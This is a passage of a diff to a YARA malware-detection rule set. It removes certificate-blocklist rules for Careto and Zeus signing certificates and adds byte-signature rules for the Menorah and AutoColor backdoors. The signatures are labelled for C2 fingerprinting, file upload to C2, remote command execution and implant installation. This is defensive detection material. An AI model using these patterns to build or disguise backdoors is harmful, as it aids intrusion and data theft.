+            98 48 89 C2 48 8D 85 ?? ?? ?? ?? 48 01 D0 48 89 45 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ??
+            48 8B 45 ?? 48 83 C0 ?? 48 8D 95 ?? ?? ?? ?? 8B 00 89 02 8B 95 ?? ?? ?? ?? 8B 05 ??
+            ?? ?? ?? 39 C2 74 ?? 8B 15 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? BF ?? ?? ?? ?? B8 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 45 ?? 0F B7 40 ?? 0F B7 C8 48 8B 45 ?? 0F B6
+            40 ?? 0F B6 D0 8B 75 ?? BF ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 75 ?? 48
+            83 C6 ?? 48 8B 45 ?? 0F B7 40 ?? 0F B7 C8 48 8B 55 ?? 48 83 C2 ?? BF ?? ?? ?? ?? 49
+            89 F0 BE ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 45 ?? 0F B6 40 ?? 84 C0 0F 84 ?? ?? ?? ??
+            48 8B 45 ?? 0F B6 40 ?? 3C ?? 75 ?? 48 8B 45 ?? 48 83 C0 ?? 8B 00 89 05 ?? ?? ?? ??
+            48 8D BD ?? ?? ?? ?? FC B9 ?? ?? ?? ?? B8 ?? ?? ?? ?? F3 AA 48 8D 85 ?? ?? ?? ?? 48
+        }
+		$main_routine_v2_p3 = {
+            C7 C1 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? B8 ?? ?? ?? ?? FC 48 8B BD ?? ?? ?? ?? F2 AE
+            48 89 C8 48 F7 D0 48 83 E8 ?? 0F B7 C8 4C 8D 8D ?? ?? ?? ?? 8B 45 ?? 0F B7 D0 48 8D
+            B5 ?? ?? ?? ?? 8B 7D ?? 41 89 C8 4C 89 C9 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 45 ??
+            0F B6 40 ?? 3C ?? 0F 85 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 85 C0 75 ?? BE ?? ?? ??
+            ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 05 ?? ?? ?? ?? 48 8B 3D ?? ?? ?? ?? BA ?? ??
+            ?? ?? BE ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ?? 48 8B 45 ?? 0F B7 40 ?? 0F
+            B7 D0 48 8B 7D ?? 48 83 C7 ?? BE ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 45 ?? 0F B7 40 ??
+            0F B7 D0 8B 05 ?? ?? ?? ?? 8D 04 02 89 05 ?? ?? ?? ?? 48 8B 45 ?? 0F B7 50 ?? 0F B7
+            05 ?? ?? ?? ?? 66 39 C2 0F 84 ?? ?? ?? ?? 48 8B 3D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 C7
+            05 ?? ?? ?? ?? ?? ?? ?? ?? 48 8D BD ?? ?? ?? ?? FC B9 ?? ?? ?? ?? B8 ?? ?? ?? ?? F3
+            AA 8B 15 ?? ?? ?? ?? 48 8D BD ?? ?? ?? ?? BE ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 48 8D B5 ?? ?? ?? ?? BF ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 85
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "IDAutomation.com" and pe.signatures [ i ] . serial == "45:31:95:4f:62:65:30:40:55:f6:6c:e4:f6:24:f9:5b" and 1384819199 <= pe.signatures [ i ] . not_after )
+		uint32( 0 ) == 0x464C457F and ( ( ( all of ( $send_result_to_peer_v1_p* ) ) and ( $execute_remote_command_v1 ) and ( all of ( $send_reply_v1_p* ) ) and ( $daemon_already_running_check_v1 ) ) or ( ( all of ( $send_result_to_peer_v2_p* ) ) and ( $execute_remote_command_v2 ) and ( all of ( $main_routine_v2_p* ) ) ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_0E808F231515Bc519Eea1A73Cdf3266F : INFO FILE
+rule REVERSINGLABS_Bytecode_MSIL_Backdoor_Menorah : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing Careto malware."
+		description = "Yara rule that detects Menorah backdoor."
 		author = "ReversingLabs"
-		id = "1f1eb5c2-bfef-58df-b51e-c558d87cd5d2"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "4f13a6c6-bd97-58aa-ac3b-399866b5c63b"
+		date = "2024-05-10"
+		modified = "2024-05-10"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L135-L151"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "05e466e304ed7a8f5c1c93aac4a4b7019d6fb1e07aeb45d078b657f838d1f3bd"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/backdoor/ByteCode.MSIL.Backdoor.Menorah.yara#L1-L169"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "770aefca192ceb3a778c0b1259105ace8e64cb35d0c34acb15c45fb6f22ad94b"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Backdoor"
+		tc_detection_name = "Menorah"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TecSystem Ltd." and pe.signatures [ i ] . serial == "0e:80:8f:23:15:15:bc:51:9e:ea:1a:73:cd:f3:26:6f" and 1468799999 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_36Be4Ad457F062Fa77D87595B8Ccc8Cf : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing Careto malware."
-		author = "ReversingLabs"
-		id = "224ec8ed-e4f0-5d1b-8cdd-a669a7e3e859"
-		date = "2023-11-08"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L153-L169"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "d19a6f22a1e702a4da69c867195722adf8f1dd84539f2c584af428fe4b1caf79"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$send_fingerprint_to_c2_p1 = {
+            28 ?? ?? ?? ?? 04 6F ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A
+            73 ?? ?? ?? ?? 19 1F 0E 6F ?? ?? ?? ?? 17 28 ?? ?? ?? ?? 1F 5B 13 ?? 12 ?? 28 ?? ??
+            ?? ?? 1F 40 13 ?? 12 ?? 28 ?? ?? ?? ?? 1F 40 13 ?? 12 ?? 28 ?? ?? ?? ?? 1F 5D 13 ??
+            12 ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 1B 8D ?? ?? ?? ?? 25 16 1F 5B 13 ?? 12 ?? 28 ??
+            ?? ?? ?? A2 25 17 1F 40 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 18 06 A2 25 19 1F 40 13 ??
+            12 ?? 28 ?? ?? ?? ?? A2 25 1A 1F 5D 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 28 ?? ?? ?? ?? 6F
+            ?? ?? ?? ?? 0B 28 ?? ?? ?? ?? 07 6F ?? ?? ?? ?? 0C 72 ?? ?? ?? ?? 0D 1F 3F 13 ?? 12
+            ?? 28 ?? ?? ?? ?? 17 16 28 ?? ?? ?? ?? 1F 3D 13 ?? 12 ?? 28 ?? ?? ?? ?? 17 16 28 ??
+            ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 03 11 ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 74 ?? ?? ?? ??
+            13 ?? 11 ?? 1F 50 13 ?? 12 ?? 28 ?? ?? ?? ?? 1F 4F 13 ?? 12 ?? 28 ?? ?? ?? ?? 1F 53
+            13 ?? 12 ?? 28 ?? ?? ?? ?? 1F 54 13 ?? 12 ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ??
+            ?? ?? 11 ?? 1F 21 8D ?? ?? ?? ?? 25 16 1F 61 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 17 1F
+            70 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 18 1F 70 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 19 1F
+            6C 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1A 1F 69 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1B 1F
+            63 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1C 1F 61 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1D 1F
+            74 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1E 1F 69 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 09
+        }
+		$send_fingerprint_to_c2_p2 = {
+            1F 6F 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 0A 1F 6E 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25
+            1F 0B 1F 2F 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 0C 1F 78 13 ?? 12 ?? 28 ?? ?? ?? ??
+            A2 25 1F 0D 1F 2D 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 0E 1F 77 13 ?? 12 ?? 28 ?? ??
+            ?? ?? A2 25 1F 0F 1F 77 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 10 1F 77 13 ?? 12 ?? 28
+            ?? ?? ?? ?? A2 25 1F 11 1F 2D 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 12 1F 66 13 ?? 12
+            ?? 28 ?? ?? ?? ?? A2 25 1F 13 1F 6F 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 14 1F 72 13
+            ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 15 1F 6D 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 16 1F
+            2D 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 17 1F 75 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F
+            18 1F 72 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 19 1F 6C 13 ?? 12 ?? 28 ?? ?? ?? ?? A2
+            25 1F 1A 1F 65 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 1B 1F 6E 13 ?? 12 ?? 28 ?? ?? ??
+            ?? A2 25 1F 1C 1F 63 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 1D 1F 6F 13 ?? 12 ?? 28 ??
+            ?? ?? ?? A2 25 1F 1E 1F 64 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 1F 1F 65 13 ?? 12 ??
+            28 ?? ?? ?? ?? A2 25 1F 20 1F 64 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 28 ?? ?? ?? ?? 6F ??
+            ?? ?? ?? 11 ?? 08 8E 69 6A 6F ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 25 08 16 08 8E 69 6F
+            ?? ?? ?? ?? 6F ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 25 6F ?? ?? ?? ?? 73 ?? ?? ?? ?? 25
+            6F ?? ?? ?? ?? 0D 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 09 13 ?? DE ?? 26 7E ?? ?? ?? ?? 13
+            ?? DE ?? 11
+        }
+		$get_files_and_directories_p1 = {
+            11 ?? 28 ?? ?? ?? ?? 13 ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 8E 69 17 31 ??
+            11 ?? 17 9A 13 ?? 11 ?? 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 1F 0F 8D
+            ?? ?? ?? ?? 25 16 1F 44 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 17 1F 69 13 ?? 12 ?? 28 ??
+            ?? ?? ?? A2 25 18 1F 72 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 19 1F 65 13 ?? 12 ?? 28 ??
+            ?? ?? ?? A2 25 1A 1F 63 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1B 1F 74 13 ?? 12 ?? 28 ??
+            ?? ?? ?? A2 25 1C 1F 6F 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1D 1F 72 13 ?? 12 ?? 28 ??
+            ?? ?? ?? A2 25 1E 1F 79 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 09 1F 20 13 ?? 12 ?? 28
+            ?? ?? ?? ?? A2 25 1F 0A 1F 6F 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 0B 1F 66 13 ?? 12
+            ?? 28 ?? ?? ?? ?? A2 25 1F 0C 1F 20 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 0D 11 ?? A2
+            25 1F 0E 72 ?? ?? ?? ?? A2 28 ?? ?? ?? ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 28
+            ?? ?? ?? ?? 13 ?? 11 ?? 13 ?? 16 13 ?? 38 ?? ?? ?? ?? 11 ?? 11 ?? 9A 73 ?? ?? ?? ??
+            13 ?? 1F 0B 8D ?? ?? ?? ?? 25 16 11 ?? A2 25 17 11 ?? 6F ?? ?? ?? ?? 13 ?? 12 ?? 1F
+            16 8D ?? ?? ?? ?? 25 16 1F 4D 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 17 1F 4D 13 ?? 12 ??
+            28 ?? ?? ?? ?? A2 25 18 1F 2F 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 19 1F 64 13 ?? 12 ??
+            28 ?? ?? ?? ?? A2 25 1A 1F 64 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1B 1F 2F 13 ?? 12 ??
+            28 ?? ?? ?? ?? A2 25 1C 1F 79 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1D 1F 79 13 ?? 12
+        }
+		$get_files_and_directories_p2 = {
+            28 ?? ?? ?? ?? A2 25 1E 1F 79 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F ?? 1F 79 13 ?? 12
+            ?? 28 ?? ?? ?? ?? A2 25 1F 0A 1F 20 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 0B 1F 68 13
+            ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 0C 1F 68 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 0D 1F
+            3A 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 0E 1F 6D 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F
+            0F 1F 6D 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 10 1F 3A 13 ?? 12 ?? 28 ?? ?? ?? ?? A2
+            25 1F 11 1F 73 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 12 1F 73 13 ?? 12 ?? 28 ?? ?? ??
+            ?? A2 25 1F 13 1F 20 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 14 1F 74 13 ?? 12 ?? 28 ??
+            ?? ?? ?? A2 25 1F 15 1F 74 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 28 ?? ?? ?? ?? 28 ?? ?? ??
+            ?? A2 25 18 72 ?? ?? ?? ?? A2 25 19 1F 3C 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1A 1F 44
+            13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1B 1F 49 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1C 1F 52
+            13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1D 1F 3E 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1E 72 ??
+            ?? ?? ?? A2 25 1F 09 11 ?? 6F ?? ?? ?? ?? A2 25 1F 0A 72 ?? ?? ?? ?? A2 28 ?? ?? ??
+            ?? 13 ?? 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E 69 3F ?? ?? ?? ?? 11 ?? 13 ?? 16 13 ?? 38
+            ?? ?? ?? ?? 11 ?? 11 ?? 9A 73 ?? ?? ?? ?? 13 ?? 1F 0C 8D ?? ?? ?? ?? 25 16 11 ?? A2
+            25 17 11 ?? 6F ?? ?? ?? ?? 13 ?? 12 ?? 1F 16 8D ?? ?? ?? ?? 25 16 1F 4D 13 ?? 12 ??
+            28 ?? ?? ?? ?? A2 25 17 1F 4D 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 18 1F 2F 13 ?? 12 ??
+            28 ?? ?? ?? ?? A2 25 19 1F 64 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1A 1F 64 13 ?? 12 ??
+            28 ?? ?? ?? ?? A2 25 1B 1F 2F 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1C 1F 79 13 ?? 12 ??
+            28 ?? ?? ?? ?? A2 25 1D 1F 79 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1E 1F 79 13 ?? 12 ??
+            28 ?? ?? ?? ?? A2 25 1F 09 1F 79 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 0A 1F 20 13
+        }
+		$get_files_and_directories_p3 = {
+            12 ?? 28 ?? ?? ?? ?? A2 25 1F 0B 1F 68 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 0C 1F 68
+            13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 0D 1F 3A 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 0E
+            1F 6D 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 0F 1F 6D 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25
+            1F 10 1F 3A 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 11 1F 73 13 ?? 12 ?? 28 ?? ?? ?? ??
+            A2 25 1F 12 1F 73 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 13 1F 20 13 ?? 12 ?? 28 ?? ??
+            ?? ?? A2 25 1F 14 1F 74 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 15 1F 74 13 ?? 12 ?? 28
+            ?? ?? ?? ?? A2 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? A2 25 18 72 ?? ?? ?? ?? A2 25 19 1F 46
+            13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1A 1F 49 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1B 1F 4C
+            13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1C 1F 45 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1D 72 ??
+            ?? ?? ?? A2 25 1E 11 ?? 6F ?? ?? ?? ?? 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 09 72 ??
+            ?? ?? ?? A2 25 1F 0A 11 ?? 6F ?? ?? ?? ?? A2 25 1F 0B 72 ?? ?? ?? ?? A2 28 ?? ?? ??
+            ?? 13 ?? 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E 69 3F ?? ?? ?? ?? 1F 0B 8D ?? ?? ?? ?? 25
+            16 11 ?? A2 25 17 72 ?? ?? ?? ?? A2 25 18 11 ?? 8E 69 13 ?? 12 ?? 28 ?? ?? ?? ?? A2
+            25 19 1F 20 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1A 1F 44 13 ?? 12 ?? 28 ?? ?? ?? ?? A2
+            25 1B 1F 69 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1C 1F 72 13 ?? 12 ?? 28 ?? ?? ?? ?? A2
+            25 1D 1F 28 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1E 1F 73 13 ?? 12 ?? 28 ?? ?? ?? ?? A2
+            25 1F 09 1F 29 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 0A 72 ?? ?? ?? ?? A2 28 ?? ?? ??
+            ?? 13 ?? 1F 0B 8D ?? ?? ?? ?? 25 16 11 ?? A2 25 17 72 ?? ?? ?? ?? A2 25 18 11 ?? 8E
+            69 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 19 1F 20 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1A 1F
+        }
+		$upload_file_to_c2_p1 = {
+            11 ?? 28 ?? ?? ?? ?? 13 ?? 72 ?? ?? ?? ?? 13 ?? 11 ?? 8E 69 17 3E ?? ?? ?? ?? 11 ??
+            17 9A 17 8D ?? ?? ?? ?? 25 16 1F 22 9D 6F ?? ?? ?? ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 39
+            ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 13 ?? 02 28 ?? ?? ?? ??
+            13 ?? 1F 0D 8D ?? ?? ?? ?? 25 16 1F 75 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 17 1F 40 13
+            ?? 12 ?? 28 ?? ?? ?? ?? A2 25 18 11 ?? A2 25 19 1F 40 13 ?? 12 ?? 28 ?? ?? ?? ?? A2
+            25 1A 28 ?? ?? ?? ?? A2 25 1B 1F 7C 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1C 28 ?? ?? ??
+            ?? A2 25 1D 1F 40 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1E 11 ?? A2 25 1F 09 1F 40 13 ??
+            12 ?? 28 ?? ?? ?? ?? A2 25 1F 0A 1F 32 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 0B 1F 40
+            13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 0C 11 ?? 28 ?? ?? ?? ?? A2 28 ?? ?? ?? ?? 13 ??
+            02 02 7B ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 26 1F 1E 8D ?? ?? ?? ?? 25 16 1F 66 13 ??
+            12 ?? 28 ?? ?? ?? ?? A2 25 17 1F 69 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 18 1F 6C 13 ??
+            12 ?? 28 ?? ?? ?? ?? A2 25 19 1F 65 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1A 1F 5B 13 ??
+            12 ?? 28 ?? ?? ?? ?? A2 25 1B 11 ?? A2 25 1C 1F 5D 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25
+            1D 1F 20 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1E 1F 69 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25
+            1F 09 1F 73 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 0A 1F 20 13 ?? 12 ?? 28
+        }
+		$upload_file_to_c2_p2 = {
+            A2 25 1F 0B 1F 75 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 0C 1F 70 13 ?? 12 ?? 28 ?? ??
+            ?? ?? A2 25 1F 0D 1F 6C 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 0E 1F 6F 13 ?? 12 ?? 28
+            ?? ?? ?? ?? A2 25 1F 0F 1F 61 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 10 1F 64 13 ?? 12
+            ?? 28 ?? ?? ?? ?? A2 25 1F 11 1F 65 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 12 1F 64 13
+            ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 13 1F 20 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 14 1F
+            74 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 15 1F 6F 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F
+            16 1F 20 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 17 1F 73 13 ?? 12 ?? 28 ?? ?? ?? ?? A2
+            25 1F 18 1F 65 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 19 1F 72 13 ?? 12 ?? 28 ?? ?? ??
+            ?? A2 25 1F 1A 1F 76 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 1B 1F 65 13 ?? 12 ?? 28 ??
+            ?? ?? ?? A2 25 1F 1C 1F 72 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 1D 1F 2E 13 ?? 12 ??
+            28 ?? ?? ?? ?? A2 28 ?? ?? ?? ?? 13 ?? 38 ?? ?? ?? ?? 1F 0F 8D ?? ?? ?? ?? 25 16 1F
+            66 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 17 1F 69 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 18 1F
+            6C 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 19 1F 65 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1A 1F
+            20 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1B 1F 6E 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1C 1F
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TecSystem Ltd." and pe.signatures [ i ] . serial == "36:be:4a:d4:57:f0:62:fa:77:d8:75:95:b8:cc:c8:cf" and 1372377599 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( all of ( $send_fingerprint_to_c2_p* ) ) and ( all of ( $get_files_and_directories_p* ) ) and ( all of ( $upload_file_to_c2_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_75A38507Bf403B152125B8F5Ce1B97Ad : INFO FILE
+rule REVERSINGLABS_Linux_Backdoor_Autocolor : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing Zeus malware."
+		description = "Yara rule that detects AutoColor backdoor."
 		author = "ReversingLabs"
-		id = "6805abd8-217e-5179-ab5a-297e2a17e65e"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "c6fea724-bd3d-56a0-a8c1-2e4d2e549766"
+		date = "2025-04-11"
+		modified = "2025-04-11"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L171-L187"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "af21cee3ee92268c3aa0106a245e5a00c5ba892fca3e4fd2dc55e302ed5d470a"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/backdoor/Linux.Backdoor.AutoColor.yara#L1-L177"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "068d4d6916437197d4b3ac9c05803a35e15c00b0e70cb61ad6361981dc7cfee3"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Backdoor"
+		tc_detection_name = "AutoColor"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "isonet ag" and pe.signatures [ i ] . serial == "75:a3:85:07:bf:40:3b:15:21:25:b8:f5:ce:1b:97:ad" and 1395359999 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_4Effa8B216E24B16202940C1Bc2Fa8A5 : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "541a169e-a263-5901-9d8e-768306b8b8ba"
-		date = "2023-11-08"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L189-L205"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "b5282fc85bbbee50c5307fff923e9e477fed8c011288e2ebd61c4b3ee801bc62"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$install_library_implant_p1 = {
